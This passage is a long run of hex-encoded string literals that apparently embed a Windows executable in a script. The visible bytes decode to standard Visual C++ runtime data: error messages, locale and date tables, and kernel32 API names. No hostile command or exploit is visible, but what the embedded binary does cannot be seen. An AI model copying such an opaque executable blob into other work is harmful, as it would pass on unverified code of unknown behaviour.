'006e6f2070726f746f636f6c206f7074696f6e00006e6f2073747265616d2' \ '07265736f7572636573006e6f207375636820646576696365206f72206164' \ '64726573730000006e6f20737563682070726f63657373006e6f742061206' \ '469726563746f7279006e6f74206120736f636b6574000000006e6f742061' \ '2073747265616d000000006e6f7420636f6e6e65637465640000006e6f742' \ '0737570706f727465640000006f7065726174696f6e20696e2070726f6772' \ '6573730000006f7065726174696f6e206e6f74207065726d6974746564006' \ 'f7065726174696f6e206e6f7420737570706f72746564006f706572617469' \ '6f6e20776f756c6420626c6f636b0000006f776e657220646561640000707' \ '26f746f636f6c206572726f72000070726f746f636f6c206e6f7420737570' \ '706f72746564000072656164206f6e6c792066696c652073797374656d000' \ '0007265736f7572636520646561646c6f636b20776f756c64206f63637572' \ '000000726573756c74206f7574206f662072616e6765007374617465206e6' \ 'f74207265636f76657261626c6500000073747265616d2074696d656f7574' \ '0000746578742066696c652062757379000074696d6564206f75740000007' \ '46f6f206d616e792066696c6573206f70656e20696e2073797374656d0000' \ '00746f6f206d616e79206c696e6b730000746f6f206d616e792073796d626' \ 'f6c6963206c696e6b206c6576656c7300000076616c756520746f6f206c61' \ '7267650077726f6e672070726f746f636f6c207479706500b027420094c04' \ '00058714200a87142001c000d000d000a0000a635002f003f00009500a447' \ '00e047e047e07700974800e048e048e08d00984900e049e049e08600994b0' \ '0e04be04be073009b4d00e04de04de074009d4f00e04fe04fe075009f5000' \ 'e050e050e09100a05100e051e051e07600a15200e052e052e09200a25300e' \ '053e053e09300a300000000000000001b001b001b00000131002100000000' \ '783200400000030079330023000000007a340024000000007b35002500000' \ '0007c36005e001e00007d370026000000007e38002a000000007f39002800' \ '0000008030002900000000812d005f001f0000823d002b000000008308000' \ '8007f00000e0900000f0094000f7100510011000010770057001700001165' \ '0045000500001272005200120000137400540014000014790059001900001' \ '5750055001500001669004900090000176f004f000f000018700050001000' \ '00195b007b001b00001a5d007d001d00001b0d000d000a00001c000000000' \ '0000000610041000100001e730053001300001f6400440004000020660046' \ '0006000021670047000700002268004800080000236a004a000a0000246b0' \ '04b000b0000256c004c000c0000263b003a00000000272700220000000028' \ '60007e000000002900000000000000005c007c001c0000007a005a001a000' \ '02c780058001800002d630043000300002e760056001600002f6200420002' \ '0000306e004e000e0000316d004d000d0000322c003c00000000332e003e0' \ '0000000342f003f000000003500000000000000002a000000720000000000' \ '00000000000020002000200020000000000000000000003b0054005e00680' \ '03c0055005f0069003d00560060006a003e00570061006b003f0058006200' \ '6c004000590063006d0041005a0064006e0042005b0065006f0043005c006' \ '600700044005d006700710000000000000000000000000000000000473700' \ '0077000000483800008d0000004939000084000000002d0000000000004b3' \ '400007300000000350000000000004d36000074000000002b000000000000' \ '4f31000075000000503200009100000051330000760000005230000092000' \ '000532e000093000000000000000000000000000000000000000000000000' \ '0000e085e087e089e08be086e088e08ae08c526f496e697469616c697a650' \ '000000063006f006d0062006100730065002e0064006c006c000000526f55' \ '6e696e697469616c697a650000410044005600410050004900330032002e0' \ '044004c004c000000000053797374656d46756e6374696f6e303336000000' \ 'f82742000cf240008bf24000556e6b6e6f776e20657863657074696f6e000' \ '00063736de001000000000000000000000003000000200593190000000000' \ '00000098b54100a4b54100b0b54100bcb541006a0061002d004a005000000' \ '07a0068002d0043004e0000006b006f002d004b00520000007a0068002d00' \ '54005700000053756e004d6f6e00547565005765640054687500467269005' \ '361740053756e64617900004d6f6e64617900005475657364617900576564' \ '6e65736461790000005468757273646179000000004672696461790000536' \ '1747572646179000000004a616e00466562004d617200417072004d617900' \ '4a756e004a756c0041756700536570004f6374004e6f7600446563004a616' \ 'e75617279004665627275617279000000004d61726368000000417072696c' \ '0000004a756e65000000004a756c790000000041756775737400005365707' \ '4656d6265720000004f63746f626572004e6f76656d626572000000004465' \ '63656d62657200000000414d0000504d00004d4d2f64642f7979000000006' \ '46464642c204d4d4d4d2064642c20797979790048483a6d6d3a7373000000' \ '00530075006e0000004d006f006e000000540075006500000057006500640' \ '0000054006800750000004600720069000000530061007400000053007500' \ '6e00640061007900000000004d006f006e006400610079000000000054007' \ '5006500730064006100790000005700650064006e00650073006400610079' \ '0000005400680075007200730064006100790000000000460072006900640' \ '0610079000000000053006100740075007200640061007900000000004a00' \ '61006e00000046006500620000004d0061007200000041007000720000004' \ 'd006100790000004a0075006e0000004a0075006c00000041007500670000' \ '0053006500700000004f006300740000004e006f007600000044006500630' \ '000004a0061006e0075006100720079000000460065006200720075006100' \ '72007900000000004d006100720063006800000041007000720069006c000' \ '0004a0075006e006500000000004a0075006c007900000000004100750067' \ '0075007300740000000000530065007000740065006d00620065007200000' \ '04f00630074006f0062006500720000004e006f00760065006d0062006500' \ '72000000000044006500630065006d006200650072000000000041004d000' \ '000000050004d00000000004d004d002f00640064002f0079007900000000' \ '0064006400640064002c0020004d004d004d004d002000640064002c00200' \ '079007900790079000000480048003a006d006d003a007300730000000000' \ '65006e002d00550053000000000000000102030405060708090a0b0c0d0e0' \ 'f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d' \ '2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4' \ 'c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a' \ '6b6c6d6e6f707172737475767778797a7b7c7d7e7f006b00650072006e006' \ '5006c00330032002e0064006c006c0000000000466c73416c6c6f63000000' \ '00466c734672656500466c7347657456616c756500466c7353657456616c7' \ '56500496e697469616c697a65437269746963616c53656374696f6e457800' \ '43726561746553656d6170686f72654578570000536574546872656164537' \ '461636b47756172616e74656500437265617465546872656164706f6f6c54' \ '696d6572000000536574546872656164706f6f6c54696d657200005761697' \ '4466f72546872656164706f6f6c54696d657243616c6c6261636b7300436c' \ '6f7365546872656164706f6f6c54696d65720000000043726561746554687' \ '2656164706f6f6c5761697400000000536574546872656164706f6f6c5761' \ '6974000000436c6f7365546872656164706f6f6c5761697400466c7573685' \ '0726f6365737357726974654275666665727300000000467265654c696272' \ '6172795768656e43616c6c6261636b52657475726e7300004765744375727' \ '2656e7450726f636573736f724e756d6265720000004765744c6f67696361' \ '6c50726f636573736f72496e666f726d6174696f6e0000437265617465537' \ '96d626f6c69634c696e6b570053657444656661756c74446c6c4469726563' \ '746f7269657300000000456e756d53797374656d4c6f63616c65734578004' \ '36f6d70617265537472696e6745780047657444617465466f726d61744578' \ '004765744c6f63616c65496e666f45780047657454696d65466f726d61744' \ '578004765745573657244656661756c744c6f63616c654e616d6500000000' \ '497356616c69644c6f63616c654e616d650000004c434d6170537472696e6' \ '7457800000047657443757272656e745061636b616765496400286e756c6c' \ '2900000000000006000006000100001000030600060210044545450505050' \ '5053530005000000000282038505807080037303057500700002020080000' \ '0000086068606060600000787078787878080708000007000808080000080' \ '0080007080000006d00730063006f007200650065002e0064006c006c0000' \ '00436f724578697450726f63657373000043004f004e0049004e002400000' \ '0000000000000050000c00b000000000000001d0000c00400000000000000' \ '960000c004000000000000008d0000c008000000000000008e0000c008000' \ '000000000008f0000c00800000000000000900000c0080000000000000091' \ '0000c00800000000000000920000c00800000000000000930000c00800000' \ '000000000b40200c00800000000000000b50200c008000000000000000c00' \ '0000900000000300000009000000520036003000300038000d000a002d002' \ '0006e006f007400200065006e006f00750067006800200073007000610063' \ '006500200066006f007200200061007200670075006d0065006e007400730' \ '00d000a00000000000000520036003000300039000d000a002d0020006e00' \ '6f007400200065006e006f007500670068002000730070006100630065002' \ '00066006f007200200065006e007600690072006f006e006d0065006e0074' \ '000d000a000000520036003000310030000d000a002d002000610062006f0' \ '07200740028002900200068006100730020006200650065006e0020006300' \ '61006c006c00650064000d000a0000000000520036003000310036000d000' \ 'a002d0020006e006f007400200065006e006f007500670068002000730070' \ '00610063006500200066006f0072002000740068007200650061006400200' \ '064006100740061000d000a000000520036003000310037000d000a002d00' \ '200075006e006500780070006500630074006500640020006d0075006c007' \ '400690074006800720065006100640020006c006f0063006b002000650072' \ '0072006f0072000d000a000000000000000000520036003000310038000d0' \ '00a002d00200075006e006500780070006500630074006500640020006800' \ '65006100700020006500720072006f0072000d000a0000000000000000005' \ '20036003000310039000d000a002d00200075006e00610062006c00650020' \ '0074006f0020006f00700065006e00200063006f006e0073006f006c00650' \ '020006400650076006900630065000d000a00000000000000000052003600' \ '3000320034000d000a002d0020006e006f007400200065006e006f0075006' \ '7006800200073007000610063006500200066006f00720020005f006f006e' \ '0065007800690074002f00610074006500780069007400200074006100620' \ '06c0065000d000a000000000000000000520036003000320035000d000a00' \ '2d002000700075007200650020007600690072007400750061006c0020006' \ '60075006e006300740069006f006e002000630061006c006c000d000a0000' \ '0000000000520036003000320036000d000a002d0020006e006f007400200' \ '065006e006f00750067006800200073007000610063006500200066006f00' \ '7200200073007400640069006f00200069006e0069007400690061006c006' \ '9007a006100740069006f006e000d000a0000000000000000005200360030' \ '00320037000d000a002d0020006e006f007400200065006e006f007500670' \ '06800200073007000610063006500200066006f00720020006c006f007700' \ '69006f00200069006e0069007400690061006c0069007a006100740069006' \ 'f006e000d000a000000000000000000520036003000320038000d000a002d' \ '00200075006e00610062006c006500200074006f00200069006e006900740' \ '0690061006c0069007a006500200068006500610070000d000a0000000000' \ '520036003000330030000d000a002d00200043005200540020006e006f007' \ '400200069006e0069007400690061006c0069007a00650064000d000a0000' \ '00000000000000520036003000330031000d000a002d00200041007400740' \ '065006d0070007400200074006f00200069006e0069007400690061006c00' \ '69007a0065002000740068006500200043005200540020006d006f0072006' \ '50020007400680061006e0020006f006e00630065002e000a005400680069' \ '007300200069006e006400690063006100740065007300200061002000620' \ '075006700200069006e00200079006f007500720020006100700070006c00' \ '690063006100740069006f006e002e000d000a00000000005200360030003' \ '30032000d000a002d0020006e006f007400200065006e006f007500670068' \ '00200073007000610063006500200066006f00720020006c006f006300610' \ '06c006500200069006e0066006f0072006d006100740069006f006e000d00' \ '0a0000000000520036003000330033000d000a002d0020004100740074006' \ '5006d0070007400200074006f00200075007300650020004d00530049004c' \ '00200063006f00640065002000660072006f006d002000740068006900730' \ '0200061007300730065006d0062006c007900200064007500720069006e00' \ '670020006e0061007400690076006500200063006f0064006500200069006' \ 'e0069007400690061006c0069007a006100740069006f006e000a00540068' \ '0069007300200069006e00640069006300610074006500730020006100200' \ '0620075006700200069006e00200079006f00750072002000610070007000' \ '6c00690063006100740069006f006e002e002000490074002000690073002' \ '0006d006f007300740020006c0069006b0065006c00790020007400680065' \ '00200072006500730075006c00740020006f0066002000630061006c006c0' \ '069006e006700200061006e0020004d00530049004c002d0063006f006d00' \ '700069006c0065006400200028002f0063006c00720029002000660075006' \ 'e006300740069006f006e002000660072006f006d002000610020006e0061' \ '007400690076006500200063006f006e007300740072007500630074006f0' \ '0720020006f0072002000660072006f006d00200044006c006c004d006100' \ '69006e002e000d000a0000000000520036003000330034000d000a002d002' \ '00069006e0063006f006e00730069007300740065006e00740020006f006e' \ '006500780069007400200062006500670069006e002d0065006e006400200' \ '07600610072006900610062006c00650073000d000a000000000044004f00' \ '4d00410049004e0020006500720072006f0072000d000a000000000053004' \ '9004e00470020006500720072006f0072000d000a000000000054004c004f' \ '005300530020006500720072006f0072000d000a000000720075006e00740' \ '069006d00650020006500720072006f00720020000000000002000000a8c6' \ '41000800000070bd410009000000c8bd41000a00000020be4100100000006' \ '8be410011000000c0be41001200000020bf41001300000068bf4100180000' \ '00c0bf41001900000030c041001a00000080c041001b000000f0c041001c0' \ '0000060c141001e000000acc141001f000000f0c1410020000000b8c24100' \ '2100000020c341002200000010c541007800000078c541007900000098c54' \ '1007a000000b4c54100fc000000a4014200ff000000d0c541005200360030' \ '00300032000d000a002d00200066006c006f006100740069006e006700200' \ '070006f0069006e007400200073007500700070006f007200740020006e00' \ '6f00740020006c006f0061006400650064000d000a0000000000520075006' \ 'e00740069006d00650020004500720072006f00720021000a000a00500072' \ '006f006700720061006d003a00200000003c00700072006f0067007200610' \ '06d0020006e0061006d006500200075006e006b006e006f0077006e003e00' \ '000000002e002e002e0000000a000a00000000004d006900630072006f007' \ '3006f00660074002000560069007300750061006c00200043002b002b0020' \ '00520075006e00740069006d00650020004c0069006200720061007200790' \ '0000000007c5b41000c2842002d5c41008bf2400062616420657863657074' \ '696f6e0000000000000070c941007cc9410084c9410090c941009cc94100a' \ '8c94100b4c94100c0c94100c8c94100d0c94100dcc94100e8c94100f2c941' \ '00a0ce4100b4ce4100d0ce4100e4ce410004cf4100f4c94100fcc9410004c' \ 'a410008ca41000cca410010ca410014ca410018ca41001cca410020ca4100' \ '2cca410030ca410034ca410038ca41003cca410040ca410044ca410048ca4' \ '1004cca410050ca410054ca410058ca41005cca410060ca410064ca410068' \ 'ca41006cca410070ca410074ca410078ca41007cca410080ca410084ca410' \ '088ca41008cca410090ca410094ca410098ca41009cca4100a0ca4100a4ca' \ '4100a8ca4100b4ca4100c0ca4100c8ca4100d4ca4100ecca4100f8ca41000' \ 'ccb41002ccb41004ccb41006ccb41008ccb4100accb4100d0cb4100eccb41' \ '0010cc410030cc410058cc410074cc410084cc410088cc410090cc4100a0c' \ 'c4100c4cc4100cccc4100d8cc4100e8cc410004cd410024cd41004ccd4100' \ '74cd41009ccd4100c8cd4100e4cd410008ce41002cce410058ce410084ce4' \ '100f2c941005f5f626173656428000000005f5f636465636c005f5f706173' \ '63616c000000005f5f73746463616c6c0000005f5f7468697363616c6c000' \ '05f5f6661737463616c6c00005f5f636c7263616c6c0000005f5f65616269' \ '00005f5f7074723634005f5f726573747269637400005f5f756e616c69676' \ 'e656400726573747269637428000000206e6577000000002064656c657465' \ '003d0000003e3e00003c3c0000210000003d3d0000213d00005b5d00006f7' \ '0657261746f72000000002d3e00002a0000002b2b00002d2d00002d000000' \ '2b000000260000002d3e2a002f000000250000003c0000003c3d00003e000' \ '0003e3d00002c000000282900007e0000005e0000007c000000262600007c' \ '7c00002a3d00002b3d00002d3d00002f3d0000253d00003e3e3d003c3c3d0' \ '0263d00007c3d00005e3d00006076667461626c6527000000607662746162' \ '6c6527000000607663616c6c270060747970656f662700000000606c6f636' \ '16c20737461746963206775617264270000000060737472696e6727000000' \ '006076626173652064657374727563746f7227000060766563746f7220646' \ '56c6574696e672064657374727563746f7227000000006064656661756c74' \ '20636f6e7374727563746f7220636c6f7375726527000000607363616c617' \ '22064656c6574696e672064657374727563746f7227000000006076656374' \ '6f7220636f6e7374727563746f72206974657261746f72270000006076656' \ '3746f722064657374727563746f72206974657261746f7227000000006076' \ '6563746f7220766261736520636f6e7374727563746f72206974657261746' \ 'f722700607669727475616c20646973706c6163656d656e74206d61702700' \ '0060656820766563746f7220636f6e7374727563746f72206974657261746' \ 'f72270000000060656820766563746f722064657374727563746f72206974' \ '657261746f72270060656820766563746f7220766261736520636f6e73747' \ '27563746f72206974657261746f7227000060636f707920636f6e73747275' \ '63746f7220636c6f73757265270000607564742072657475726e696e67270' \ '0604548006052545449000000606c6f63616c2076667461626c652700606c' \ '6f63616c2076667461626c6520636f6e7374727563746f7220636c6f73757' \ '2652700206e65775b5d00002064656c6574655b5d000000606f6d6e692063' \ '616c6c73696727000060706c6163656d656e742064656c65746520636c6f7' \ '375726527000060706c6163656d656e742064656c6574655b5d20636c6f73' \ '7572652700000000606d616e6167656420766563746f7220636f6e7374727' \ '563746f72206974657261746f7227000000606d616e616765642076656374' \ '6f722064657374727563746f72206974657261746f7227000000006065682' \ '0766563746f7220636f707920636f6e7374727563746f7220697465726174' \ '6f722700000060656820766563746f7220766261736520636f707920636f6' \ 'e7374727563746f72206974657261746f7227006064796e616d696320696e' \ '697469616c697a657220666f72202700006064796e616d696320617465786' \ '9742064657374727563746f7220666f7220270000000060766563746f7220' \ '636f707920636f6e7374727563746f72206974657261746f7227000060766' \ '563746f7220766261736520636f707920636f6e7374727563746f72206974' \ '657261746f722700000000606d616e6167656420766563746f7220636f707' \ '920636f6e7374727563746f72206974657261746f72270000606c6f63616c' \ '2073746174696320746872656164206775617264270020547970652044657' \ '363726970746f7227000000204261736520436c6173732044657363726970' \ '746f72206174202800204261736520436c617373204172726179270000204' \ '36c617373204869657261726368792044657363726970746f722700000000' \ '20436f6d706c657465204f626a656374204c6f6361746f722700000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000200020002000200020002000200020002000280028' \ '0028002800280020002000200020002000200020002000200020002000200' \ '0200020002000200020002000480010001000100010001000100010001000' \ '1000100010001000100010001000840084008400840084008400840084008' \ '4008400100010001000100010001000100081008100810081008100810001' \ '0001000100010001000100010001000100010001000100010001000100010' \ '0010001000100010010001000100010001000100082008200820082008200' \ '8200020002000200020002000200020002000200020002000200020002000' \ '2000200020002000200020010001000100010002000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000200020002000200020002000200020002000680028002800280' \ '0280020002000200020002000200020002000200020002000200020002000' \ '2000200020002000480010001000100010001000100010001000100010001' \ '0001000100010001000840084008400840084008400840084008400840010' \ '0010001000100010001000100081018101810181018101810101010101010' \ '1010101010101010101010101010101010101010101010101010101010101' \ '0101010110001000100010001000100082018201820182018201820102010' \ '2010201020102010201020102010201020102010201020102010201020102' \ '0102010201020110001000100010002000200020002000200020002000200' \ '0200020002000200020002000200020002000200020002000200020002000' \ '2000200020002000200020002000200020002000480010001000100010001' \ '0001000100010001000100010001000100010001000100010001400140010' \ '0010001000100010001400100010001000100010001000010101010101010' \ '1010101010101010101010101010101010101010101010101010101010101' \ '0101010101010101100001010101010101010101010101010201020102010' \ '2010201020102010201020102010201020102010201020102010201020102' \ '0102010201020102010201100002010201020102010201020102010201010' \ '100000000808182838485868788898a8b8c8d8e8f90919293949596979899' \ '9a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b' \ '8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6' \ 'd7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f' \ '5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f10111213' \ '1415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f30313' \ '2333435363738393a3b3c3d3e3f406162636465666768696a6b6c6d6e6f70' \ '7172737475767778797a5b5c5d5e5f606162636465666768696a6b6c6d6e6' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'cbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e' \ '9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff8081828384858687' \ '<KEY>' \ '<KEY>' \ 'c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e' \ '3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff0001' \ '02030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f2' \ '<KEY>' \ '<KEY>' \ 'd5e5f604142434445464748494a4b4c4d4e4f505152535455565758595a7b' \ '7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999' \ 'a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8' \ 'b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d' \ '7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5' \ 'f6f7f8f9fafbfcfdfeff0100000068e541000200000070e54100030000007' \ '8e541000400000080e541000500000090e541000600000098e54100070000' \ '00a0e5410008000000a8e5410009000000b0e541000a000000b8e541000b0' \ '00000c0e541000c000000c8e541000d000000d0e541000e000000d8e54100' \ '0f000000e0e5410010000000e8e5410011000000f0e5410012000000f8e54' \ '1001300000000e641001400000008e641001500000010e641001600000018' \ 'e641001800000020e641001900000028e641001a00000030e641001b00000' \ '038e641001c00000040e641001d00000048e641001e00000050e641001f00' \ '000058e641002000000060e641002100000068e641002200000070e641002' \ '300000078e641002400000080e641002500000088e641002600000090e641' \ '002700000098e6410029000000a0e641002a000000a8e641002b000000b0e' \ '641002c000000b8e641002d000000c0e641002f000000c8e6410036000000' \ 'd0e6410037000000d8e6410038000000e0e6410039000000e8e641003e000' \ '000f0e641003f000000f8e641004000000000e741004100000008e7410043' \ '00000010e741004400000018e741004600000020e741004700000028e7410' \ '04900000030e741004a00000038e741004b00000040e741004e00000048e7' \ '41004f00000050e741005000000058e741005600000060e74100570000006' \ '8e741005a00000070e741006500000078e741007f00000030014200010400' \ '0080e74100020400008ce741000304000098e7410004040000bcb54100050' \ '40000a4e7410006040000b0e7410007040000bce7410008040000c8e74100' \ '0904000018b941000b040000d4e741000c040000e0e741000d040000ece74' \ '1000e040000f8e741000f04000004e841001004000010e841001104000098' \ 'b5410012040000b0b54100130400001ce841001404000028e841001504000' \ '034e841001604000040e84100180400004ce841001904000058e841001a04' \ '000064e841001b04000070e841001c0400007ce841001d04000088e841001' \ 'e04000094e841001f040000a0e8410020040000ace8410021040000b8e841' \ '0022040000c4e8410023040000d0e8410024040000dce8410025040000e8e' \ '8410026040000f4e841002704000000e94100290400000ce941002a040000' \ '18e941002b04000024e941002c04000030e941002d04000048e941002f040' \ '00054e941003204000060e94100340400006ce941003504000078e9410036' \ '04000084e941003704000090e94100380400009ce9410039040000a8e9410' \ '03a040000b4e941003b040000c0e941003e040000cce941003f040000d8e9' \ '410040040000e4e9410041040000f0e9410043040000fce94100440400001' \ '4ea41004504000020ea4100460400002cea41004704000038ea4100490400' \ '0044ea41004a04000050ea41004b0400005cea41004c04000068ea41004e0' \ '4000074ea41004f04000080ea4100500400008cea41005204000098ea4100' \ '56040000a4ea410057040000b0ea41005a040000c0ea410065040000d0ea4' \ '1006b040000e0ea41006c040000f0ea410081040000fcea41000108000008' \ 'eb410004080000a4b541000708000014eb41000908000020eb41000a08000' \ '02ceb41000c08000038eb41001008000044eb41001308000050eb41001408' \ '00005ceb41001608000068eb41001a08000074eb41001d0800008ceb41002' \ 'c08000098eb41003b080000b0eb41003e080000bceb410043080000c8eb41' \ '006b080000e0eb4100010c0000f0eb4100040c0000fceb4100070c000008e' \ 'c4100090c000014ec41000a0c000020ec41000c0c00002cec41001a0c0000' \ '38ec41003b0c000050ec41006b0c00005cec4100011000006cec410004100' \ '00078ec41000710000084ec41000910000090ec41000a1000009cec41000c' \ '100000a8ec41001a100000b4ec41003b100000c0ec410001140000d0ec410' \ '004140000dcec410007140000e8ec410009140000f4ec41000a14000000ed' \ '41000c1400000ced41001a14000018ed41003b14000030ed4100011800004' \ '0ed4100091800004ced41000a18000058ed41000c18000064ed41001a1800' \ '0070ed41003b18000088ed4100011c000098ed4100091c0000a4ed41000a1' \ 'c0000b0ed41001a1c0000bced41003b1c0000d4ed410001200000e4ed4100' \ '09200000f0ed41000a200000fced41003b20000008ee41000124000018ee4' \ '1000924000024ee41000a24000030ee41003b2400003cee4100012800004c' \ 'ee41000928000058ee41000a28000064ee4100012c000070ee4100092c000' \ '07cee41000a2c000088ee41000130000094ee410009300000a0ee41000a30' \ '0000acee410001340000b8ee410009340000c4ee41000a340000d0ee41000' \ '1380000dcee41000a380000e8ee4100013c0000f4ee41000a3c000000ef41' \ '00014000000cef41000a40000018ef41000a44000024ef41000a48000030e' \ 'f41000a4c00003cef41000a50000048ef4100047c000054ef41001a7c0000' \ '64ef41003001420042000000d0e641002c0000006cef41007100000068e54' \ '1000000000078ef4100d800000084ef4100da00000090ef4100b10000009c' \ 'ef4100a0000000a8ef41008f000000b4ef4100cf000000c0ef4100d500000' \ '0ccef4100d2000000d8ef4100a9000000e4ef4100b9000000f0ef4100c400' \ '0000fcef4100dc00000008f041004300000014f04100cc00000020f04100b' \ 'f0000002cf04100c8000000b8e641002900000038f041009b00000050f041' \ '006b00000078e641002100000068f041006300000070e541000100000074f' \ '041004400000080f041007d0000008cf04100b700000078e5410002000000' \ 'a4f041004500000090e5410004000000b0f0410047000000bcf0410087000' \ '00098e5410005000000c8f0410048000000a0e5410006000000d4f04100a2' \ '000000e0f0410091000000ecf0410049000000f8f04100b300000004f1410' \ '0ab00000078e741004100000010f141008b000000a8e541000700000020f1' \ '41004a000000b0e54100080000002cf14100a300000038f14100cd0000004' \ '4f14100ac00000050f14100c90000005cf141009200000068f14100ba0000' \ '0074f14100c500000080f14100b40000008cf14100d600000098f14100d00' \ '00000a4f141004b000000b0f14100c0000000bcf14100d3000000b8e54100' \ '09000000c8f14100d1000000d4f14100dd000000e0f14100d7000000ecf14' \ '100ca000000f8f14100b500000004f24100c100000010f24100d40000001c' \ 'f24100a400000028f24100ad00000034f24100df00000040f241009300000' \ '04cf24100e000000058f24100bb00000064f24100ce00000070f24100e100' \ '00007cf24100db00000088f24100de00000094f24100d9000000a0f24100c' \ '600000088e6410023000000acf2410065000000c0e641002a000000b8f241' \ '006c000000a0e6410026000000c4f2410068000000c0e541000a000000d0f' \ '241004c000000e0e641002e000000dcf2410073000000c8e541000b000000' \ 'e8f2410094000000f4f24100a500000000f34100ae0000000cf341004d000' \ '00018f34100b600000024f34100bc00000060e741003e00000030f3410088' \ '00000028e74100370000003cf341007f000000d0e541000c00000048f3410' \ '04e000000e8e641002f00000054f341007400000030e641001800000060f3' \ '4100af0000006cf341005a000000d8e541000d00000078f341004f000000b' \ '0e641002800000084f341006a00000068e641001f00000090f34100610000' \ '00e0e541000e0000009cf3410050000000e8e541000f000000a8f34100950' \ '00000b4f3410051000000f0e5410010000000c0f3410052000000d8e64100' \ '2d000000ccf3410072000000f8e6410031000000d8f341007800000040e74' \ '1003a000000e4f3410082000000f8e541001100000068e741003f000000f0' \ 'f341008900000000f441005300000000e74100320000000cf441007900000' \ '098e641002500000018f441006700000090e641002400000024f441006600' \ '000030f441008e000000c8e641002b0000003cf441006d00000048f441008' \ '300000058e741003d00000054f441008600000048e741003b00000060f441' \ '0084000000f0e64100300000006cf441009d00000078f441007700000084f' \ '441007500000090f441005500000000e64100120000009cf4410096000000' \ 'a8f4410054000000b4f441009700000008e6410013000000c0f441008d000' \ '00020e7410036000000ccf441007e00000010e6410014000000d8f4410056' \ '00000018e6410015000000e4f4410057000000f0f4410098000000fcf4410' \ '08c0000000cf541009f0000001cf54100a800000020e64100160000002cf5' \ '41005800000028e641001700000038f541005900000050e741003c0000004' \ '4f541008500000050f54100a70000005cf541007600000068f541009c0000' \ '0038e641001900000074f541005b00000080e641002200000080f54100640' \ '000008cf54100be0000009cf54100c3000000acf54100b0000000bcf54100' \ 'b8000000ccf54100cb000000dcf54100c700000040e641001a000000ecf54' \ '1005c00000064ef4100e3000000f8f54100c200000010f64100bd00000028' \ 'f64100a600000040f641009900000048e641001b00000058f641009a00000' \ '064f641005d00000008e741003300000070f641007a00000070e741004000' \ '00007cf641008a00000030e74100380000008cf641008000000038e741003' \ '900000098f641008100000050e641001c000000a4f641005e000000b0f641' \ '006e00000058e641001d000000bcf641005f00000018e7410035000000c8f' \ '641007c00000070e6410020000000d4f641006200000060e641001e000000' \ 'e0f641006000000010e7410034000000ecf641009e00000004f741007b000' \ '000a8e64100270000001cf741006900000028f741006f00000034f7410003' \ '00000044f74100e200000054f741009000000060f74100a10000006cf7410' \ '0b200000078f74100aa00000084f741004600000090f74100700000006100' \ '720000000000620067000000000063006100000000007a0068002d0043004' \ '8005300000000006300730000000000640061000000000064006500000000' \ '0065006c000000000065006e0000000000650073000000000066006900000' \ '0000066007200000000006800650000000000680075000000000069007300' \ '0000000069007400000000006a006100000000006b006f00000000006e006' \ 'c00000000006e006f000000000070006c0000000000700074000000000072' \ '006f00000000007200750000000000680072000000000073006b000000000' \ '0730071000000000073007600000000007400680000000000740072000000' \ '00007500720000000000690064000000000075006b0000000000620065000' \ '000000073006c000000000065007400000000006c007600000000006c0074' \ '0000000000660061000000000076006900000000006800790000000000610' \ '07a000000000065007500000000006d006b00000000006100660000000000' \ '6b0061000000000066006f000000000068006900000000006d00730000000' \ '0006b006b00000000006b00790000000000730077000000000075007a0000' \ '0000007400740000000000700061000000000067007500000000007400610' \ '00000000074006500000000006b006e00000000006d007200000000007300' \ '6100000000006d006e000000000067006c00000000006b006f006b0000007' \ '3007900720000006400690076000000610072002d00530041000000620067' \ '002d00420047000000630061002d00450053000000630073002d0043005a0' \ '00000640061002d0044004b000000640065002d0044004500000065006c00' \ '2d00470052000000660069002d00460049000000660072002d00460052000' \ '000680065002d0049004c000000680075002d00480055000000690073002d' \ '00490053000000690074002d004900540000006e006c002d004e004c00000' \ '06e0062002d004e004f00000070006c002d0050004c000000700074002d00' \ '42005200000072006f002d0052004f000000720075002d005200550000006' \ '80072002d0048005200000073006b002d0053004b000000730071002d0041' \ '004c000000730076002d00530045000000740068002d00540048000000740' \ '072002d00540052000000750072002d0050004b000000690064002d004900' \ '4400000075006b002d00550041000000620065002d0042005900000073006' \ 'c002d00530049000000650074002d004500450000006c0076002d004c0056' \ '0000006c0074002d004c0054000000660061002d004900520000007600690' \ '02d0056004e000000680079002d0041004d00000061007a002d0041005a00' \ 